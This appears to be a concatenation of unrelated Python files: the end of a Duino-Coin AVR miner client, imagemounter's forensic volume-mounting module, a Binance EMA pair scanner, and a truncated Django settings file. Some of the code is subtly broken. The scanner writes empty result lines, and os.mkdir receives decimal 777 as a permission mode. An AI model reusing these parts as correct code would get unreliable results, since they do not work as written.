+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
debug_output(com + f': error parsing response: {e}')
sleep(5)
break
if feedback[0] == 'GOOD':
shares[0] += 1
printlock.acquire()
share_print(port_num(com), "accept",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
elif feedback[0] == 'BLOCK':
shares[0] += 1
shares[2] += 1
printlock.acquire()
share_print(port_num(com), "block",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
elif feedback[0] == 'BAD':
shares[1] += 1
printlock.acquire()
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping, feedback[1])
printlock.release()
else:
printlock.acquire()
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping, feedback)
printlock.release()
title(get_string('duco_avr_miner') + str(Settings.VER)
+ f') - {shares[0]}/{(shares[0] + shares[1])}'
+ get_string('accepted_shares'))
end_time = time()
elapsed_time = end_time - start_time
if threadid == 0 and elapsed_time >= Settings.REPORT_TIME:
report_shares = shares[0] - last_report_share
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time, end_time, report_shares,
shares[2], hashrate, uptime)
start_time = time()
last_report_share = shares[0]
def periodic_report(start_time, end_time, shares,
block, hashrate, uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" " + get_string('periodic_mining_report')
+ Fore.RESET + Style.NORMAL
+ get_string('report_period')
+ str(seconds) + get_string('report_time')
+ get_string('report_body1')
+ str(shares) + get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3')
+ get_string('report_body7') + str(block)
+ get_string('report_body4')
+ str(int(hashrate)) + " H/s" + get_string('report_body5')
+ str(int(hashrate*seconds)) + get_string('report_body6')
+ get_string('total_mining_time') + str(uptime), "success")
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime >= 7200: # 2 hours, plural
return str(uptime // 3600) + get_string('uptime_hours')
elif uptime >= 3600: # 1 hour, not plural
return str(uptime // 3600) + get_string('uptime_hour')
elif uptime >= 120: # 2 minutes, plural
return str(uptime // 60) + get_string('uptime_minutes')
elif uptime >= 60: # 1 minute, not plural
return str(uptime // 60) + get_string('uptime_minute')
else: # less than 1 minute
return str(round(uptime)) + get_string('uptime_seconds')
if __name__ == '__main__':
init(autoreset=True)
title(f"{get_string('duco_avr_miner')}{str(Settings.VER)})")
if sys.platform == "win32":
os.system('') # Enable VT100 Escape Sequence for WINDOWS 10 Ver. 1607
check_updates()
try:
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0', get_string('load_config_error')
+ Settings.DATA_DIR + get_string('load_config_error_warning')
+ Style.NORMAL + Fore.RESET + f' ({e})', 'error')
debug_output(f'Error reading configfile: {e}')
sleep(10)
_exit(1)
try:
greeting()
debug_output('Greeting displayed')
except Exception as e:
debug_output(f'Error displaying greeting message: {e}')
try:
check_mining_key(config)
except Exception as e:
debug_output(f'Error checking miner key: {e}')
if donation_level > 0:
try:
Donate.load(donation_level)
Donate.start(donation_level)
except Exception as e:
debug_output(f'Error launching donation thread: {e}')
try:
fastest_pool = Client.fetch_pool()
threadid = 0
for port in avrport:
Thread(target=mine_avr,
args=(port, threadid,
fastest_pool)).start()
threadid += 1
except Exception as e:
debug_output(f'Error launching AVR thread(s): {e}')
if discord_presence == "y":
try:
init_rich_presence()
except Exception as e:
debug_output(f'Error launching Discord RPC thread: {e}')
|
volume.py
|
import collections
import io
import logging
import os
import subprocess
import re
import tempfile
import threading
import shutil
import warnings
from imagemounter import _util, filesystems, FILE_SYSTEM_TYPES, VOLUME_SYSTEM_TYPES, dependencies
from imagemounter.exceptions import NoMountpointAvailableError, SubsystemError, \
NoLoopbackAvailableError, NotMountedError, \
ImageMounterError
from imagemounter.volume_system import VolumeSystem
logger = logging.getLogger(__name__)
class Volume(object):
"""Information about a volume. Note that every detected volume gets their own Volume object, though it may or may
not be mounted. This can be seen through the :attr:`mountpoint` attribute -- if it is not set, perhaps the
:attr:`exception` attribute is set with an exception.
"""
def __init__(self, disk, parent=None, index="0", size=0, offset=0, flag='alloc', slot=0, fstype=None, key="",
vstype='', volume_detector='auto'):
"""Creates a Volume object that is not mounted yet.
Only use arguments as keyword arguments.
:param disk: the parent disk
:type disk: :class:`Disk`
:param parent: the parent volume or disk.
:param str index: the volume index within its volume system, see the attribute documentation.
:param int size: the volume size, see the attribute documentation.
:param int offset: the volume offset, see the attribute documentation.
:param str flag: the volume flag, see the attribute documentation.
:param int slot: the volume slot, see the attribute documentation.
:param FileSystem fstype: the fstype you wish to use for this Volume.
If not specified, will be retrieved from the ImageParser instance instead.
:param str key: the key to use for this Volume.
:param str vstype: the volume system type to use.
:param str volume_detector: the volume system detection method to use
"""
self.parent = parent
self.disk = disk
# Should be filled somewhere
self.size = size
self.offset = offset
self.index = index
self.slot = slot
self.flag = flag
self.block_size = self.disk.block_size
self.volumes = VolumeSystem(parent=self, vstype=vstype, volume_detector=volume_detector)
self._get_fstype_from_parser(fstype)
if key:
self.key = key
elif self.index in self.disk.parser.keys:
self.key = self.disk.parser.keys[self.index]
elif '*' in self.disk.parser.keys:
self.key = self.disk.parser.keys['*']
else:
self.key = ""
self.info = {}
self._paths = {}
self.mountpoint = ""
self.loopback = ""
self.was_mounted = False
self.is_mounted = False
def __unicode__(self):
return '{0}:{1}'.format(self.index, self.info.get('fsdescription') or '-')
def __str__(self):
return str(self.__unicode__())
def __getitem__(self, item):
return self.volumes[item]
@property
def numeric_index(self):
try:
return tuple([int(x) for x in self.index.split(".")])
except ValueError:
return ()
@property
def fstype(self):
warnings.warn("fstype is deprecated in favor of filesystem", DeprecationWarning)
return self.filesystem
def _get_fstype_from_parser(self, fstype=None):
"""Load fstype information from the parser instance."""
if not fstype:
if self.index in self.disk.parser.fstypes:
fstype = self.disk.parser.fstypes[self.index]
elif '*' in self.disk.parser.fstypes:
fstype = self.disk.parser.fstypes['*']
elif '?' in self.disk.parser.fstypes and self.disk.parser.fstypes['?'] is not None:
fstype = "?" + self.disk.parser.fstypes['?']
else:
fstype = ""
if not fstype:
self.filesystem = None
elif fstype in VOLUME_SYSTEM_TYPES:
self.volumes.vstype = fstype
self.filesystem = FILE_SYSTEM_TYPES["volumesystem"](self)
elif fstype.startswith("?"):
fallback = FILE_SYSTEM_TYPES[fstype[1:]](self)
self.filesystem = filesystems.FallbackFileSystem(self, fallback)
else:
self.filesystem = FILE_SYSTEM_TYPES[fstype](self)
def get_description(self, with_size=True, with_index=True):
"""Obtains a generic description of the volume, containing the file system type, index, label and NTFS version.
If *with_size* is provided, the volume size is also included.
"""
desc = ''
if with_size and self.size:
desc += '{0} '.format(self.get_formatted_size())
s = self.info.get('statfstype') or self.info.get('fsdescription') or '-'
if with_index:
desc += '{1}:{0}'.format(s, self.index)
else:
desc += s
if self.info.get('label'):
desc += ' {0}'.format(self.info.get('label'))
if self.info.get('version'): # NTFS
desc += ' [{0}]'.format(self.info.get('version'))
return desc
def get_formatted_size(self):
"""Obtains the size of the volume in a human-readable format (i.e. in TiBs, GiBs or MiBs)."""
if self.size is not None:
if self.size < 1024:
return "{0} B".format(self.size)
elif self.size < 1024 ** 2:
return "{0} KiB".format(round(self.size / 1024, 2))
elif self.size < 1024 ** 3:
return "{0} MiB".format(round(self.size / 1024 ** 2, 2))
elif self.size < 1024 ** 4:
return "{0} GiB".format(round(self.size / 1024 ** 3, 2))
else:
return "{0} TiB".format(round(self.size / 1024 ** 4, 2))
else:
return self.size
@dependencies.require(dependencies.blkid, none_on_failure=True)
def _get_blkid_type(self):
"""Retrieves the FS type from the blkid command."""
try:
result = _util.check_output_(['blkid', '-p', '-O', str(self.offset), self.get_raw_path()])
if not result:
return None
# noinspection PyTypeChecker
blkid_result = dict(re.findall(r'([A-Z]+)="(.+?)"', result))
self.info['blkid_data'] = blkid_result
if 'PTTYPE' in blkid_result and 'TYPE' not in blkid_result:
return blkid_result.get('PTTYPE')
else:
return blkid_result.get('TYPE')
except Exception:
return None # returning None is better here, since we do not care about the exception in determine_fs_type
@dependencies.require(dependencies.magic, none_on_failure=True)
def _get_magic_type(self):
"""Checks the volume for its magic bytes and returns the magic."""
try:
with io.open(self.disk.get_fs_path(), "rb") as file:
file.seek(self.offset)
fheader = file.read(min(self.size, 4096) if self.size else 4096)
except IOError:
logger.exception("Failed reading first 4K bytes from volume.")
return None
# TODO fallback to img-cat image -s blocknum | file -
# if we were able to load the module magic
try:
# noinspection PyUnresolvedReferences
import magic
if hasattr(magic, 'from_buffer'):
# using https://github.com/ahupp/python-magic
logger.debug("Using python-magic Python package for file type magic")
result = magic.from_buffer(fheader).decode()
self.info['magic_data'] = result
return result
elif hasattr(magic, 'open'):
# using Magic file extensions by Rueben Thomas (Ubuntu python-magic module)
logger.debug("Using python-magic system package for file type magic")
ms = magic.open(magic.NONE)
ms.load()
result = ms.buffer(fheader)
ms.close()
self.info['magic_data'] = result
return result
else:
logger.warning("The python-magic module is not available, but another module named magic was found.")
except ImportError:
logger.warning("The python-magic module is not available.")
except AttributeError:
logger.warning("The python-magic module is not available, but another module named magic was found.")
return None # returning None is better here, since we do not care about the exception in determine_fs_type
def get_raw_path(self, include_self=False):
"""Retrieves the base mount path of the volume. Typically equals to :func:`Disk.get_fs_path` but may also be the
path to a logical volume. This is used to determine the source path for a mount call.
The value returned is normally based on the parent's paths, e.g. if this volume is mounted to a more specific
path, only its children return the more specific path, this volume itself will keep returning the same path.
This makes for consistent use of the offset attribute. If you do not need this behaviour, you can override this
with the include_self argument.
This behavior, however, is not retained for paths that directly affect the volume itself, not the child volumes.
This includes VSS stores and LV volumes.
"""
v = self
if not include_self:
# lv / vss_store are exceptions, as it covers the volume itself, not the child volume
if v._paths.get('lv'):
return v._paths['lv']
elif v._paths.get('vss_store'):
return v._paths['vss_store']
elif v.parent and v.parent != self.disk:
v = v.parent
else:
return self.disk.get_fs_path()
while True:
if v._paths.get('lv'):
return v._paths['lv']
elif v._paths.get('bde'):
return v._paths['bde'] + '/bde1'
elif v._paths.get('luks'):
return '/dev/mapper/' + v._paths['luks']
elif v._paths.get('md'):
return v._paths['md']
elif v._paths.get('vss_store'):
return v._paths['vss_store']
# Only if the volume has a parent that is not a disk, we try to check the parent for a location.
if v.parent and v.parent != self.disk:
v = v.parent
else:
break
return self.disk.get_fs_path()
def get_safe_label(self):
"""Returns a label that is safe to add to a path in the mountpoint for this volume."""
if self.info.get('label') == '/':
return 'root'
suffix = re.sub(r"[/ \(\)]+", "_", self.info.get('label')) if self.info.get('label') else ""
if suffix and suffix[0] == '_':
suffix = suffix[1:]
if len(suffix) > 2 and suffix[-1] == '_':
suffix = suffix[:-1]
return suffix
@dependencies.require(dependencies.photorec)
def carve(self, freespace=True):
"""Call this method to carve the free space of the volume for (deleted) files. Note that photorec has its
own interface that temporarily takes over the shell.
:param freespace: indicates whether the entire volume should be carved (False) or only the free space (True)
:type freespace: bool
:return: string to the path where carved data is available
:raises CommandNotFoundError: if the underlying command does not exist
:raises SubsystemError: if the underlying command fails
:raises NoMountpointAvailableError: if there is no mountpoint available
:raises NoLoopbackAvailableError: if there is no loopback available (only when volume has no slot number)
"""
self._paths['carve'] = self._make_mountpoint(suffix="carve")
# if no slot, we need to make a loopback that we can use to carve the volume
loopback_was_created_for_carving = False
if not self.slot:
if not self.loopback:
self._find_loopback()
# Can't carve if volume has no slot number and can't be mounted on loopback.
loopback_was_created_for_carving = True
# noinspection PyBroadException
try:
_util.check_call_(["photorec", "/d", self._paths['carve'] + os.sep, "/cmd", self.loopback,
("freespace," if freespace else "") + "search"])
# clean out the loop device if we created it specifically for carving
if loopback_was_created_for_carving:
# noinspection PyBroadException
try:
_util.check_call_(['losetup', '-d', self.loopback])
except Exception:
pass
else:
self.loopback = ""
return self._paths['carve']
except Exception as e:
logger.exception("Failed carving the volume.")
raise SubsystemError(e)
else:
# noinspection PyBroadException
try:
_util.check_call_(["photorec", "/d", self._paths['carve'] + os.sep, "/cmd", self.get_raw_path(),
str(self.slot) + (",freespace" if freespace else "") + ",search"])
return self._paths['carve']
except Exception as e:
logger.exception("Failed carving the volume.")
raise SubsystemError(e)
@dependencies.require(dependencies.vshadowmount)
def detect_volume_shadow_copies(self):
"""Method to call vshadowmount and mount NTFS volume shadow copies.
:return: iterable with the :class:`Volume` objects of the VSS
:raises CommandNotFoundError: if the underlying command does not exist
:raises SubSystemError: if the underlying command fails
:raises NoMountpointAvailableError: if there is no mountpoint available
"""
self._paths['vss'] = self._make_mountpoint(suffix="vss")
try:
_util.check_call_(["vshadowmount", "-o", str(self.offset), self.get_raw_path(), self._paths['vss']])
except Exception as e:
logger.exception("Failed mounting the volume shadow copies.")
raise SubsystemError(e)
else:
return self.volumes.detect_volumes(vstype='vss')
def _should_mount(self, only_mount=None, skip_mount=None):
"""Indicates whether this volume should be mounted. Internal method, used by imount.py"""
om = only_mount is None \
or self.index in only_mount \
or self.info.get('lastmountpoint') in only_mount \
or self.info.get('label') in only_mount
sm = skip_mount is None \
or (self.index not in skip_mount
and self.info.get('lastmountpoint') not in skip_mount
and self.info.get('label') not in skip_mount)
return om and sm
def init(self, only_mount=None, skip_mount=None, swallow_exceptions=True):
"""Generator that mounts this volume and either yields itself or recursively generates its subvolumes.
More specifically, this function will call :func:`load_fsstat_data` (iff *no_stats* is False), followed by
:func:`mount`, followed by a call to :func:`detect_mountpoint`, after which ``self`` is yielded, or the result
of the :func:`init` call on each subvolume is yielded
:param only_mount: if specified, only volume indexes in this list are mounted. Volume indexes are strings.
:param skip_mount: if specified, volume indexes in this list are not mounted.
:param swallow_exceptions: if True, any error occuring when mounting the volume is swallowed and added as an
exception attribute to the yielded objects.
"""
if swallow_exceptions:
self.exception = None
try:
if not self._should_mount(only_mount, skip_mount):
yield self
return
if not self.init_volume():
yield self
return
except ImageMounterError as e:
if swallow_exceptions:
self.exception = e
else:
raise
if not self.volumes:
yield self
else:
for v in self.volumes:
yield from v.init(only_mount, skip_mount, swallow_exceptions)
def init_volume(self):
"""Initializes a single volume. You should use this method instead of :func:`mount` if you want some sane checks
before mounting.
"""
logger.debug("Initializing volume {0}".format(self))
if not self._should_mount():
return False
if self.flag != 'alloc':
return False
if self.info.get('raid_status') == 'waiting':
logger.info("RAID array %s not ready for mounting", self)
return False
if self.is_mounted:
logger.info("%s is currently mounted, not mounting it again", self)
return False
logger.info("Mounting volume {0}".format(self))
self.mount()
self.detect_mountpoint()
return True
def _make_mountpoint(self, casename=None, suffix=''):
"""Creates a directory that can be used as a mountpoint.
:returns: the mountpoint path
:raises NoMountpointAvailableError: if no mountpoint could be made
"""
parser = self.disk.parser
if parser.mountdir and not os.path.exists(parser.mountdir):
os.makedirs(parser.mountdir)
if parser.pretty:
md = parser.mountdir or tempfile.gettempdir()
case_name = casename or self.disk.parser.casename or \
".".join(os.path.basename(self.disk.paths[0]).split('.')[0:-1]) or \
os.path.basename(self.disk.paths[0])
fstype = self.filesystem.type if self.filesystem is not None else None
if self.disk.parser.casename == case_name: # the casename is already in the path in this case
pretty_label = "{0}-{1}".format(self.index, self.get_safe_label() or fstype or 'volume')
else:
pretty_label = "{0}-{1}-{2}".format(case_name, self.index,
self.get_safe_label() or fstype or 'volume')
if suffix:
pretty_label += "-" + suffix
path = os.path.join(md, pretty_label)
# check if path already exists, otherwise try to find another nice path
if os.path.exists(path):
for i in range(2, 100):
path = os.path.join(md, pretty_label + "-" + str(i))
if not os.path.exists(path):
break
else:
logger.error("Could not find free mountdir.")
raise NoMountpointAvailableError()
# noinspection PyBroadException
try:
os.mkdir(path, 777)
return path
except Exception:
logger.exception("Could not create mountdir.")
raise NoMountpointAvailableError()
else:
t = tempfile.mkdtemp(prefix='im_' + self.index + '_',
suffix='_' + self.get_safe_label() + ("_" + suffix if suffix else ""),
dir=parser.mountdir)
return t
def _clear_mountpoint(self):
"""Clears a created mountpoint. Does not unmount it, merely deletes it."""
if self.mountpoint:
os.rmdir(self.mountpoint)
self.mountpoint = ""
def _find_loopback(self, use_loopback=True, var_name='loopback'):
"""Finds a free loopback device that can be used. The loopback is stored in :attr:`loopback`. If *use_loopback*
is True, the loopback will also be used directly.
:returns: the loopback address
:raises NoLoopbackAvailableError: if no loopback could be found
"""
# noinspection PyBroadException
try:
loopback = _util.check_output_(['losetup', '-f']).strip()
setattr(self, var_name, loopback)
except Exception:
logger.warning("No free loopback device found.", exc_info=True)
raise NoLoopbackAvailableError()
# noinspection PyBroadException
if use_loopback:
try:
cmd = ['losetup', '-o', str(self.offset), '--sizelimit', str(self.size),
loopback, self.get_raw_path()]
if not self.disk.read_write:
cmd.insert(1, '-r')
_util.check_call_(cmd, stdout=subprocess.PIPE)
except Exception:
logger.exception("Loopback device could not be mounted.")
raise NoLoopbackAvailableError()
return loopback
def _free_loopback(self, var_name='loopback'):
if getattr(self, var_name):
_util.check_call_(['losetup', '-d', getattr(self, var_name)], wrap_error=True)
setattr(self, var_name, "")
def determine_fs_type(self):
"""Determines the FS type for this partition. This function is used internally to determine which mount system
to use, based on the file system description. Return values include *ext*, *ufs*, *ntfs*, *lvm* and *luks*.
Note: does not do anything if fstype is already set to something sensible.
"""
fstype_fallback = None
if isinstance(self.filesystem, filesystems.FallbackFileSystem):
fstype_fallback = self.filesystem.fallback
elif isinstance(self.filesystem, filesystems.FileSystem):
return self.filesystem
result = collections.Counter()
for source, description in (('fsdescription', self.info.get('fsdescription')),
('guid', self.info.get('guid')),
('blikid', self._get_blkid_type),
('magic', self._get_magic_type)):
# For efficiency reasons, not all functions are called instantly.
if callable(description):
description = description()
logger.debug("Trying to determine fs type from {} '{}'".format(source, description))
if not description:
continue
# Iterate over all results and update the certainty of all FS types
for type in FILE_SYSTEM_TYPES.values():
result.update(type.detect(source, description))
# Now sort the results by their certainty
logger.debug("Current certainty levels: {}".format(result))
# If we have not found any candidates, we continue
if not result:
continue
# If we have candidates of which we are not entirely certain, we just continue
max_res = result.most_common(1)[0][1]
if max_res < 50:
logger.debug("Highest certainty item is lower than 50, continuing...")
# If we have multiple candidates with the same score, we just continue
elif len([True for type, certainty in result.items() if certainty == max_res]) > 1:
logger.debug("Multiple items with highest certainty level, so continuing...")
else:
self.filesystem = result.most_common(1)[0][0](self)
return self.filesystem
# Now be more lax with the fallback:
if result:
max_res = result.most_common(1)[0][1]
if max_res > 0:
self.filesystem = result.most_common(1)[0][0](self)
return self.filesystem
if fstype_fallback:
self.filesystem = fstype_fallback
return self.filesystem
def mount(self):
"""Based on the file system type as determined by :func:`determine_fs_type`, the proper mount command is executed
for this volume. The volume is mounted in a temporary path (or a pretty path if :attr:`pretty` is enabled) in
the mountpoint as specified by :attr:`mountpoint`.
If the file system type is a LUKS container or LVM, additional methods may be called, adding subvolumes to
:attr:`volumes`
:raises NotMountedError: if the parent volume/disk is not mounted
:raises NoMountpointAvailableError: if no mountpoint was found
:raises NoLoopbackAvailableError: if no loopback device was found
:raises UnsupportedFilesystemError: if the fstype is not supported for mounting
:raises SubsystemError: if one of the underlying commands failed
"""
if not self.parent.is_mounted:
raise NotMountedError(self.parent)
self.filesystem = self.determine_fs_type()
self._load_fsstat_data()
# Prepare mount command
try:
self.filesystem.mount()
self.was_mounted = True
self.is_mounted = True
except Exception as e:
logger.exception("Execution failed due to {} {}".format(type(e), e), exc_info=True)
if not isinstance(e, ImageMounterError):
raise SubsystemError(e)
else:
raise
def bindmount(self, mountpoint):
"""Bind mounts the volume to another mountpoint. Only works if the volume is already mounted.
:raises NotMountedError: when the volume is not yet mounted
:raises SubsystemError: when the underlying command failed
"""
if not self.mountpoint:
raise NotMountedError(self)
try:
_util.check_call_(['mount', '--bind', self.mountpoint, mountpoint], stdout=subprocess.PIPE)
if 'bindmounts' in self._paths:
self._paths['bindmounts'].append(mountpoint)
else:
self._paths['bindmounts'] = [mountpoint]
return True
except Exception as e:
logger.exception("Error bind mounting {0}.".format(self))
raise SubsystemError(e)
def get_volumes(self):
"""Recursively gets a list of all subvolumes and the current volume."""
if self.volumes:
volumes = []
for v in self.volumes:
volumes.extend(v.get_volumes())
volumes.append(self)
return volumes
else:
return [self]
@dependencies.require(dependencies.fsstat, none_on_failure=True)
def _load_fsstat_data(self, timeout=3):
"""Using :command:`fsstat`, adds some additional information of the volume to the Volume."""
def stats_thread():
try:
cmd = ['fsstat', self.get_raw_path(), '-o', str(self.offset // self.disk.block_size)]
# Setting the fstype explicitly makes fsstat much faster and more reliable
# In some versions, the auto-detect yaffs2 check takes ages for large images
fstype = {
"ntfs": "ntfs", "fat": "fat", "ext": "ext", "iso": "iso9660", "hfs+": "hfs",
"ufs": "ufs", "swap": "swap", "exfat": "exfat",
}.get(self.filesystem.type, None)
if fstype:
cmd.extend(["-f", fstype])
logger.debug('$ {0}'.format(' '.join(cmd)))
stats_thread.process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
for line in iter(stats_thread.process.stdout.readline, b''):
line = line.decode('utf-8')
logger.debug('< {0}'.format(line))
if line.startswith("File System Type:"):
self.info['statfstype'] = line[line.index(':') + 2:].strip()
elif line.startswith("Last Mount Point:") or line.startswith("Last mounted on:"):
self.info['lastmountpoint'] = line[line.index(':') + 2:].strip().replace("//", "/")
elif line.startswith("Volume Name:") and not self.info.get('label'):
self.info['label'] = line[line.index(':') + 2:].strip()
elif line.startswith("Version:"):
self.info['version'] = line[line.index(':') + 2:].strip()
elif line.startswith("Source OS:"):
self.info['version'] = line[line.index(':') + 2:].strip()
elif 'CYLINDER GROUP INFORMATION' in line or 'BLOCK GROUP INFORMATION' in line:
# noinspection PyBroadException
try:
stats_thread.process.terminate()
logger.debug("Terminated fsstat at cylinder/block group information.")
except Exception:
pass
break
if self.info.get('lastmountpoint') and self.info.get('label'):
self.info['label'] = "{0} ({1})".format(self.info['lastmountpoint'], self.info['label'])
elif self.info.get('lastmountpoint') and not self.info.get('label'):
self.info['label'] = self.info['lastmountpoint']
elif not self.info.get('lastmountpoint') and self.info.get('label') and \
self.info['label'].startswith("/"): # e.g. /boot1
if self.info['label'].endswith("1"):
self.info['lastmountpoint'] = self.info['label'][:-1]
else:
self.info['lastmountpoint'] = self.info['label']
except Exception: # ignore any exceptions here.
logger.exception("Error while obtaining stats.")
stats_thread.process = None
thread = threading.Thread(target=stats_thread)
thread.start()
thread.join(timeout)
if thread.is_alive():
# noinspection PyBroadException
try:
stats_thread.process.terminate()
except Exception:
pass
thread.join()
logger.debug("Killed fsstat after {0}s".format(timeout))
def detect_mountpoint(self):
"""Attempts to detect the previous mountpoint if this was not done through :func:`load_fsstat_data`. This
detection does some heuristic method on the mounted volume.
"""
if self.info.get('lastmountpoint'):
return self.info.get('lastmountpoint')
if not self.mountpoint:
return None
result = None
paths = os.listdir(self.mountpoint)
if 'grub' in paths:
result = '/boot'
elif 'usr' in paths and 'var' in paths and 'root' in paths:
result = '/'
elif 'bin' in paths and 'lib' in paths and 'local' in paths and 'src' in paths and 'usr' not in paths:
result = '/usr'
elif 'bin' in paths and 'lib' in paths and 'local' not in paths and 'src' in paths and 'usr' not in paths:
result = '/usr/local'
elif 'lib' in paths and 'local' in paths and 'tmp' in paths and 'var' not in paths:
result = '/var'
# elif sum(['bin' in paths, 'boot' in paths, 'cdrom' in paths, 'dev' in paths, 'etc' in paths, 'home' in paths,
# 'lib' in paths, 'lib64' in paths, 'media' in paths, 'mnt' in paths, 'opt' in paths,
# 'proc' in paths, 'root' in paths, 'sbin' in paths, 'srv' in paths, 'sys' in paths, 'tmp' in paths,
# 'usr' in paths, 'var' in paths]) > 11:
# result = '/'
if result:
self.info['lastmountpoint'] = result
if not self.info.get('label'):
self.info['label'] = self.info['lastmountpoint']
logger.info("Detected mountpoint as {0} based on files in volume".format(self.info['lastmountpoint']))
return result
# noinspection PyBroadException
def unmount(self, allow_lazy=False):
"""Unounts the volume from the filesystem.
:raises SubsystemError: if one of the underlying processes fails
:raises CleanupError: if the cleanup fails
"""
for volume in self.volumes:
try:
volume.unmount(allow_lazy=allow_lazy)
except ImageMounterError:
pass
if self.is_mounted:
logger.info("Unmounting volume %s", self)
if self._paths.get('vss'):
try:
_util.clean_unmount(['fusermount', '-u'], self._paths['vss'])
except SubsystemError:
if not allow_lazy:
raise
_util.clean_unmount(['fusermount', '-uz'], self._paths['vss'])
del self._paths['vss']
if self._paths.get('bindmounts'):
for mp in self._paths['bindmounts']:
_util.clean_unmount(['umount'], mp, rmdir=False)
del self._paths['bindmounts']
if self._paths.get('carve'):
try:
shutil.rmtree(self._paths['carve'])
except OSError as e:
raise SubsystemError(e)
else:
del self._paths['carve']
self.filesystem.unmount(allow_lazy=allow_lazy)
self.is_mounted = False
|
binance_pairs_ema.py
|
import requests
import json
import os
import time
from threading import Thread
from bfxhfindicators import EMA
BASE_URL = 'https://api.binance.com'
TIMEFRAME = '15m'
EMA_PERIODS = [96, 288]
symbols = []
candles = {}
prices = {}
ema_values = {}
def load_candles(sym):
global candles, prices, BASE_URL
payload = {
'symbol': sym,
'interval': '15m',
'limit': 250
}
resp = requests.get(BASE_URL + '/api/v3/klines', params=payload)
klines = json.loads(resp.content)
# parse klines and store open, high, low, close and vol only
parsed_klines = []
for k in klines:
k_candle = {
'open': float(k[1]),
'high': float(k[2]),
'low': float(k[3]),
'close': float(k[4]),
'vol': float(k[5])
}
parsed_klines.append(k_candle)
candles[sym] = parsed_klines
index = len(parsed_klines) - 1 # get index of latest candle
prices[sym] = parsed_klines[index]['close'] # save current price
# create results folder if it doesn't exist
if not os.path.exists('results/'):
os.makedirs('results/')
# start with blank files
open('results/good.txt', 'w').close()
open('results/bad.txt', 'w').close()
# load symbols information
print('Getting list of BTC trade pairs...')
resp = requests.get(BASE_URL + '/api/v3/ticker/bookTicker')
tickers_list = json.loads(resp.content)
for ticker in tickers_list:
if str(ticker['symbol'])[-4:] == 'USDT':
symbols.append(ticker['symbol'])
# get 15m candles for symbols
print('Loading candle data for symbols...')
for sym in symbols:
Thread(target=load_candles, args=(sym,)).start()
while len(candles) < len(symbols):
print('%s/%s loaded' %(len(candles), len(symbols)), end='\r', flush=True)
time.sleep(0.1)
# calculate EMAs for each symbol
print('Calculating EMAs...')
for sym in candles:
for period in EMA_PERIODS:
iEMA = EMA(period)
lst_candles = candles[sym][:]
for c in lst_candles:
iEMA.add(c['close'])
if sym not in ema_values:
ema_values[sym] = {}
ema_values[sym][period] = iEMA.v()
# save filtered EMA results in txt files
print('Saving filtered EMA results to txt files...')
for sym in ema_values:
ema_96 = ema_values[sym][96]
ema_288 = ema_values[sym][288]
price = prices[sym]
entry = ''
if price < ema_288 and price > ema_96 or price > ema_288:
# save good symbols
f = open('results/good.txt', 'a')
#entry = '%s: $%s\n' %(sym, round(price,3))
entry = '%s'
entry = entry[:-4]
f.write(entry + '\n')
elif price < ema_96 and price < ema_288:
# save bad symbols
f = open('results/bad.txt', 'a')
entry = '%s'
entry = entry[:-4]
f.write(entry + '\n')
f.close()
del f # cleanup
print('All done! Results saved in results folder.')
|
settings_20210906111013.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails)
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:11").do(decrease_day_count_and_send_bday_mails)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
# print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
